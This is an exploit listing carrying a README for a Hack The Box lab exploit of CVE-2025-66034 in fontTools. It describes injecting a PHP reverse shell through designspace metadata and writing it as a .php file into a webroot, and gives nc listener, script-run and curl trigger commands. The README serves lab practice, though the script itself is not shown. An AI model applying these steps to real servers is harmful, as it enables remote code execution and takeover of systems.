Exploit for XML Injection (aka Blind XPath Injection) in Fonttools CVE-2025-66034

Name: Exploit for XML Injection (aka Blind XPath Injection) in Fonttools CVE-2025-66034
Rating: 5 (118 reviews)
2026-04-07 | CVSS 9.8
## https://sploitus.com/exploit?id=BD95669A-AA70-5E5C-9FCD-6435DA06BC74
# CVE-2025-66034-htb-ctf

# VariaType Variable Font Generator Exploit

This repository contains a specialized exploit for the **VariaType** machine on Hack The Box. The exploit leverages a vulnerability in how the `fontTools` library or the web application handles `.designspace` XML files and metadata interpolation to achieve **Remote Code Execution (RCE)**.

## 📝 Description

The vulnerability exists in the font generation process. By crafting a malicious `designspace` file, we can inject a PHP reverse shell payload into the font's metadata (specifically the `` field). When the server processes these files to generate a variable font, it writes the output to a user-defined path, allowing us to drop a `.php` shell in the webroot.

## 🛠️ Features

* **Automated Font Generation**: Creates valid `source-light.ttf` and `source-regular.ttf` master fonts using `fontTools`.
* **XML Injection**: Generates a malicious `designspace` file with a CDATA-wrapped PHP payload.
* **Path Traversal/Arbitrary File Write**: Attempts to save the resulting "font" as a `.php` file in the public directory.
* **Randomization**: Generates unique shell names to avoid conflicts.

## 🚀 Requirements

You must have Python 3 installed along with the following libraries:

```bash
pip install fontTools requests
```

## 💻 Usage

### 1. Start your listener
On your local machine (or Pwnbox), start a Netcat listener:
```bash
nc -lvnp 4444
```

### 2. Run the exploit
Execute the script by providing your HTB VPN IP and the listener port:

```bash
python3 exploit.py --ip  --port 4444
```

### 3. Trigger the shell
If the upload returns a `200 OK` (or sometimes even a `500` if the processing happens before the error), the script will provide the filename. Access it via `curl` or your browser:

```bash
curl http://portal.variatype.htb/shell_xxxxxx.php
```

## ⚙️ Arguments

| Argument | Description | Default |
| :--- | :--- | :--- |
| `--ip` | Your listener IP (VPN) | **Required** |
| `--port` | Your listener port | **Required** |
| `--path` | Target path for the shell | `/var/www/portal.variatype.htb/public` |
| `--url` | The upload endpoint | `http://variatype.htb/tools/.../process` |

## ⚠️ Disclaimer

This script is intended for educational purposes and authorized penetration testing only. Accessing or attacking targets without prior authorization is illegal.

---

### How to use this README:
1. Save the content above as `README.md` in the same folder as your script.
2. Ensure your script is named `exploit.py` or update the filename in the commands above.